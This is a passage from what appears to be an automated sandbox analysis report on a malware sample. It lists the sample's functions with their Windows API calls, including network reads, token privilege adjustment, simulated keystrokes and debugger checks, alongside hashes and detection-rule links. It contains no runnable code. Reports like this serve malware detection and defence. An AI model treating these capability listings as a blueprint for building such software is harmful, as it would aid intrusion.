                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: d36aee95b12fb0b7efc67c2cdb3ce6f17a901ca138e453d9ecf81ad5e5dee46e
                                    • Instruction ID: dc6fd5a82acaf58cc27193ee95642baca881eab2ce787061f6b932fd6f34262d
                                    • Opcode Fuzzy Hash: d36aee95b12fb0b7efc67c2cdb3ce6f17a901ca138e453d9ecf81ad5e5dee46e
                                    • Instruction Fuzzy Hash: 37311EB0A41284BEFF358A66CC05BFA77ABAF5C310F04421AF181951D1D37CA945C752
                                    Function 007BBB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 007BBB7F
                                      • Part of subcall function 007B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000), ref: 007B29DE
                                      • Part of subcall function 007B29C8: GetLastError.KERNEL32(00000000,?,007BD7D1,00000000,00000000,00000000,00000000,?,007BD7F8,00000000,00000007,00000000,?,007BDBF5,00000000,00000000), ref: 007B29F0
                                    • GetTimeZoneInformation.KERNEL32 ref: 007BBB91
                                    • WideCharToMultiByte.KERNEL32(00000000,?,0085121C,000000FF,?,0000003F,?,?), ref: 007BBC09
                                    • WideCharToMultiByte.KERNEL32(00000000,?,00851270,000000FF,?,0000003F,?,?,?,0085121C,000000FF,?,0000003F,?,?), ref: 007BBC36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                    • String ID:
                                    • API String ID: 806657224-0
                                    • Opcode ID: b07d34acccf668b310a0aea16e05e51b5aec1ef74148cef3e1a0524324c68686
                                    • Instruction ID: f4dc10513dd33fa82942b720f7f3e794847c43e3124480f36c07bbf3cc996751
                                    • Opcode Fuzzy Hash: b07d34acccf668b310a0aea16e05e51b5aec1ef74148cef3e1a0524324c68686
                                    • Instruction Fuzzy Hash: 7431D070944205EFCB10DF68CC84ABEBFB8FF45751B1446AAE820DB2A1D7789E40CB60
                                    Function 007FCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 007FCE89
                                    • GetLastError.KERNEL32(?,00000000), ref: 007FCEEA
                                    • SetEvent.KERNEL32(?,?,00000000), ref: 007FCEFE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorEventFileInternetLastRead
                                    • String ID:
                                    • API String ID: 234945975-0
                                    • Opcode ID: 651589ccb9721d0346af272ff0e79afe8e5e321c397516b85e0c19dd35bf82b2
                                    • Instruction ID: 2f42d0afdd1fa285024436f40b838e8accf6344e75914ffb87019b20c4156870
                                    • Opcode Fuzzy Hash: 651589ccb9721d0346af272ff0e79afe8e5e321c397516b85e0c19dd35bf82b2
                                    • Instruction Fuzzy Hash: 5B219AB154030D9BEB21CF65CA48BA6B7FCEF40314F10881AE64692251E778AA048B60
                                    Function 007E8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007E82AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: c44f5ec6e81791c4ebae645d9a8c280d8f8a01435d1d2db6e8a53b76b2074986
                                    • Instruction ID: 4149a0571ed236324e38503a483f882b529b52c7ae15d1ebbdb096b09a7172e2
                                    • Opcode Fuzzy Hash: c44f5ec6e81791c4ebae645d9a8c280d8f8a01435d1d2db6e8a53b76b2074986
                                    • Instruction Fuzzy Hash: 42324474A00745DFCB68CF5AC080A6AB7F0FF48710B15856EE59ADB3A1EB74E981CB41
                                    Function 007F5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007F5CC1
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 007F5D17
                                    • FindClose.KERNEL32(?), ref: 007F5D5F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: 46a226c69011e2bdc324d934b9a8ec8fcfffb0ccf52564e69f53fef4b3fafaf6
                                    • Instruction ID: eed8a23cf819f42970bc96aad37c081ac2f08df73d8ffc5ac34dbff8bdd5e8ce
                                    • Opcode Fuzzy Hash: 46a226c69011e2bdc324d934b9a8ec8fcfffb0ccf52564e69f53fef4b3fafaf6
                                    • Instruction Fuzzy Hash: 2D519B74704A05DFC714DF28C498AA6B7E4FF49324F14855DEA6A8B3A1DB34EC04CB91
                                    Function 007B2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 007B271A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 007B2724
                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 007B2731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                    • String ID:
                                    • API String ID: 3906539128-0
                                    • Opcode ID: 536550a4753985429dead9b0f17f1531643699ae78d3b66b092bde095601cdc7
                                    • Instruction ID: 9463945405aebe5e95515f5e2247881b2fa789b7506ebf071bc4ff169c055651
                                    • Opcode Fuzzy Hash: 536550a4753985429dead9b0f17f1531643699ae78d3b66b092bde095601cdc7
                                    • Instruction Fuzzy Hash: E231D5749412189BCB21DF68DC887DCB7B8BF08310F5082EAE41CA7261EB349F818F44
                                    Function 007F51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 007F51DA
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007F5238
                                    • SetErrorMode.KERNEL32(00000000), ref: 007F52A1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: 45b5113f94b774295eda33cfed0e116e81b9f2e0165224c362974530584c9fc9
                                    • Instruction ID: 47d10881aedd4e43c2ec95dd6d35729b6c5b91f70966c1ed9d449fc1410f0be2
                                    • Opcode Fuzzy Hash: 45b5113f94b774295eda33cfed0e116e81b9f2e0165224c362974530584c9fc9
                                    • Instruction Fuzzy Hash: 78316F75A00518DFDB00DF54D888EADBBB4FF49318F088099E905AB362DB35EC55CBA0
                                    Function 007E16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0079FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007A0668
                                      • Part of subcall function 0079FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 007A0685
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007E170D
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007E173A
                                    • GetLastError.KERNEL32 ref: 007E174A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                    • String ID:
                                    • API String ID: 577356006-0
                                    • Opcode ID: fb29f1fd7ac9f6c25950f5f41f8058c492e362a3f901e18445ce32835e650598
                                    • Instruction ID: 90c46c281033b348ac764ba9a1d2733a69837e16fe23b4e621fda8aad46d2b19
                                    • Opcode Fuzzy Hash: fb29f1fd7ac9f6c25950f5f41f8058c492e362a3f901e18445ce32835e650598
                                    • Instruction Fuzzy Hash: 0911C1B2510304AFD7189F55EC86DAAB7BDFF08714B20852EE05697241EB74BC41CB20
                                    Function 007ED5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007ED608
                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007ED645
                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007ED650
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle
                                    • String ID:
                                    • API String ID: 33631002-0
                                    • Opcode ID: 9ca57c4c1ab65718f6b529b051876f88f48c543699973ae87a0e2acd37937d4b
                                    • Instruction ID: 4fe1fbd6f3ad46ae0ee665fa76e8b1008edb8d0e37a8d751955dc5e8cc7f3225
                                    • Opcode Fuzzy Hash: 9ca57c4c1ab65718f6b529b051876f88f48c543699973ae87a0e2acd37937d4b
                                    • Instruction Fuzzy Hash: 81113C75E45228BBDB208F95AC45FEFBBBCEB49B50F108115F914E7290D6704A058BA1
                                    Function 007E1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 007E168C
                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007E16A1
                                    • FreeSid.ADVAPI32(?), ref: 007E16B1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                    • String ID:
                                    • API String ID: 3429775523-0
                                    • Opcode ID: 6463c54fae06877e0b59209a4eae85cf89073f4cf0f9150933da4349117507f7
                                    • Instruction ID: 5141e23dd69e340eaa784078012efd95185b1a3a14b7ef3ebde28c42572ebf62
                                    • Opcode Fuzzy Hash: 6463c54fae06877e0b59209a4eae85cf89073f4cf0f9150933da4349117507f7
                                    • Instruction Fuzzy Hash: 22F0F471990309FBDB00DFE49C89EAEBBBCFF08604F508565E501E2181E774AA448A50
                                    Function 007A4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(007B28E9,?,007A4CBE,007B28E9,008488B8,0000000C,007A4E15,007B28E9,00000002,00000000,?,007B28E9), ref: 007A4D09
                                    • TerminateProcess.KERNEL32(00000000,?,007A4CBE,007B28E9,008488B8,0000000C,007A4E15,007B28E9,00000002,00000000,?,007B28E9), ref: 007A4D10
                                    • ExitProcess.KERNEL32 ref: 007A4D22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: e6ffb99a331a215a8e0d919a99775f63c2775821700ddf00a4b42443e6aca0d9
                                    • Instruction ID: f3aba2855a94e87f90d4af9d973f37a67fd70a2c8728a5852db436d2a94d9c6b
                                    • Opcode Fuzzy Hash: e6ffb99a331a215a8e0d919a99775f63c2775821700ddf00a4b42443e6aca0d9
                                    • Instruction Fuzzy Hash: 56E0B631140548BBCF11AF64DD09A987B7DFF82785B108114FE158A222DB7ADE42CA80
                                    Function 007DD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 007DD28C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID: X64
                                    • API String ID: 2645101109-893830106
                                    • Opcode ID: 445818ea39b1451389ef8354e75e833269855ff7a3ee531c93bc013b8fba3232
                                    • Instruction ID: b5803644003edd0590a93b722eef7ab904c3f180b45a3bc5c9eb8cd9e5c5d245
                                    • Opcode Fuzzy Hash: 445818ea39b1451389ef8354e75e833269855ff7a3ee531c93bc013b8fba3232
                                    • Instruction Fuzzy Hash: 34D0C9B480111DEACFA4CB90ED88DD9B37CBB14345F104152F146E2100D77499488F10
                                    Function 007ACAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                    • Instruction ID: c0de05c59713b00922d74cb38e4397d428d5c9d0b7b7dde4d333507b126c31cd
                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                    • Instruction Fuzzy Hash: 86023E72E00219AFDF15CFA9C8806ADFBF1EF89324F254269D919E7341D735AD418B90
                                    Function 007F68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007F6918
                                    • FindClose.KERNEL32(00000000), ref: 007F6961
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 0aacb2e0c45c67a510c87d1630f0a75c3877e8671813cc4f54350fb71e00131a
                                    • Instruction ID: fdcfd924041d1ee4bc358d73edcdf61297565564abe000cd8b401b7220237a7d
                                    • Opcode Fuzzy Hash: 0aacb2e0c45c67a510c87d1630f0a75c3877e8671813cc4f54350fb71e00131a
                                    • Instruction Fuzzy Hash: 79118E716042049FD710DF29D488A26BBE5FF85328F14C69DE5698F7A2C774EC05CB91
                                    Function 007F37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00804891,?,?,00000035,?), ref: 007F37E4
                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00804891,?,?,00000035,?), ref: 007F37F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: d9c8c1bd28b501265f8b89de27c169a86a8a7f18d7cc94df000dd074b9f7a55b
                                    • Instruction ID: b7d072e97c0372f80529e3fb48f0c975a2bed4a4d7b9b78b5f38620c9a8eaddb
                                    • Opcode Fuzzy Hash: d9c8c1bd28b501265f8b89de27c169a86a8a7f18d7cc94df000dd074b9f7a55b
                                    • Instruction Fuzzy Hash: 33F0E5B06052286AE72027769C8DFEB3BAEEFC5761F000279F609D2381D9B09944C7B1
                                    Function 007EB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 007EB25D
                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 007EB270
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: InputSendkeybd_event
                                    • String ID:
                                    • API String ID: 3536248340-0
                                    • Opcode ID: ef5aa8f83e47d19ec13bbfc04609a4ab1b328cf73ee335e5e3bbdb385eb893fc
                                    • Instruction ID: 22b03b2a157bcdbf7239dfca608af9cfcfc20364b8ec58532e80afc565b1b5ea
                                    • Opcode Fuzzy Hash: ef5aa8f83e47d19ec13bbfc04609a4ab1b328cf73ee335e5e3bbdb385eb893fc
                                    • Instruction Fuzzy Hash: 17F01D7184428DABDB059FA5C805BEE7FB4FF08305F008409F955A5191C37986119F94
                                    Function 007E10BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007E11FC), ref: 007E10D4
                                    • CloseHandle.KERNEL32(?,?,007E11FC), ref: 007E10E9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: 22b0b42bbcd78b9d7da32ddcb61893ee6494116f9953846805bc64d5fbb8a4e7
                                    • Instruction ID: a087c1bfd8e33357710d75f317e7c1777c438ddb0539398d41834fa47e79c04a
                                    • Opcode Fuzzy Hash: 22b0b42bbcd78b9d7da32ddcb61893ee6494116f9953846805bc64d5fbb8a4e7
                                    • Instruction Fuzzy Hash: E3E09A72154610EEEB256B51FC09EB777A9EF04310B24C82DF5A5804B1DB666C909A50
                                    Function 0078CAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                    Download Yara Rule
                                    Strings
                                    • Variable is not of type 'Object'., xrefs: 007D0C40
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
